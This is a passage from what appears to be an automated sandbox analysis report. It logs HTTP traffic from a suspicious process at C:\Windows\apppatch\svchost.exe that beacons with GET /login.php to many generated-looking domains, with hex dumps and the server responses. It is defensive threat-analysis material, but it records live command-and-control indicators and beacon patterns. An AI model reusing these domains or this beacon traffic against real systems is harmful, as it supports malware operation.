                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BRZg%2BUk6lrqYmvP1Cj8C9ZW2WAJf6z%2B1jFPEejCNiv98b3mL96dumiDDh96%2BelDvtABwmabNfcteNPCt5fYwzirPG%2BOCIDA0dwBB3aDl72VPhdSN%2BJsrkEK%2FfTvULQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8b7c955bc9f17d08-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                              Aug 23, 2024 18:47:19.731738091 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lysyvan.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:20.835799932 CEST786INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:20 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: https://lysyvan.com/login.php
                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C7gXySXQrf62a%2FXwM76nUfIAZ2MGqHr025izH2Uea44MHod6Vzp2g6MHML8qhY7re5mnCGWJZ6Lt9%2BLnji6mc6WhohVxqt3xZTA%2BS3lRM9auYwg60bJiGtc0zRaBlQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8b7c9574a98d7d08-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                              Aug 23, 2024 18:47:20.935643911 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              18192.168.2.45111118.208.156.248806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:16.118697882 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: pupycag.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:16.684410095 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:16 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=0e9c6b135bbf78b20bee3c60ff917523|8.46.123.33|1724431636|1724431636|0|1|0; path=/; domain=.pupycag.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              19192.168.2.451112103.150.11.230806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:16.504283905 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyrysor.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:17.469763041 CEST403INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                              Server: openresty/1.15.8.1
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:17 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 151
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.com
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                              Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
                                                                                                                                                                                                              Aug 23, 2024 18:47:18.726305962 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyrysor.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:19.028413057 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyrysor.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:19.476067066 CEST403INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                              Server: openresty/1.15.8.1
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:19 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 151
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.com
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                              Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              20192.168.2.451116106.15.137.6680016720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:17.479486942 CEST295OUTGET /dh/147287063_637385.html HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: 106.15.137.66:8001
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:18.725167036 CEST1043INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: openresty/1.21.4.3
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:18 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 561
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->HTTP/1.1 400 Bad RequestServer: openresty/1.21.4.3Date: Fri, 23 Aug 2024 16:47:18 GMTContent-Type: text/htmlContent-Length: 163Connection: close<html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.21.4.3</center></body></html>
                                                                                                                                                                                                              Aug 23, 2024 18:47:19.150254965 CEST1043INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: openresty/1.21.4.3
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:18 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 561
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->HTTP/1.1 400 Bad RequestServer: openresty/1.21.4.3Date: Fri, 23 Aug 2024 16:47:18 GMTContent-Type: text/htmlContent-Length: 163Connection: close<html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.21.4.3</center></body></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              21192.168.2.451119106.15.137.6680016720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:19.486538887 CEST295OUTGET /dh/147287063_637385.html HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: 106.15.137.66:8001
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:20.627298117 CEST1043INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: openresty/1.21.4.3
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:20 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 561
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->HTTP/1.1 400 Bad RequestServer: openresty/1.21.4.3Date: Fri, 23 Aug 2024 16:47:20 GMTContent-Type: text/htmlContent-Length: 163Connection: close<html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.21.4.3</center></body></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              22192.168.2.45112213.248.169.48806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:25.910887957 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: pupydeq.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              23192.168.2.45112464.225.91.73806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.474280119 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: galynuh.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:38.185277939 CEST816INHTTP/1.1 200 OK
                                                                                                                                                                                                              server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                              date: Fri, 23 Aug 2024 16:47:38 GMT
                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                              content-length: 593
                                                                                                                                                                                                              last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                              etag: "63f68860-251"
                                                                                                                                                                                                              accept-ranges: bytes
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              24192.168.2.45112544.221.84.105806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.602103949 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gadyciz.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:38.147263050 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:38 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=e67e5bdc7da6809b4e043748c6ce58a1|8.46.123.33|1724431658|1724431658|0|1|0; path=/; domain=.gadyciz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              25192.168.2.451128103.224.182.252806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.731829882 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: vofycot.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:38.392822027 CEST338INHTTP/1.1 302 Found
                                                                                                                                                                                                              date: Fri, 23 Aug 2024 16:47:38 GMT
                                                                                                                                                                                                              server: Apache
                                                                                                                                                                                                              set-cookie: __tad=1724431658.5743798; expires=Mon, 21-Aug-2034 16:47:38 GMT; Max-Age=315360000
                                                                                                                                                                                                              location: http://ww16.vofycot.com/login.php?sub1=20240824-0247-3846-ad61-5b1f45bc95f4
                                                                                                                                                                                                              content-length: 2
                                                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                              Data Raw: 0a 0a
                                                                                                                                                                                                              Data Ascii:


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              26192.168.2.451129103.224.212.210806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:38.030421972 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyxynyx.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:38.714612961 CEST340INHTTP/1.1 302 Found
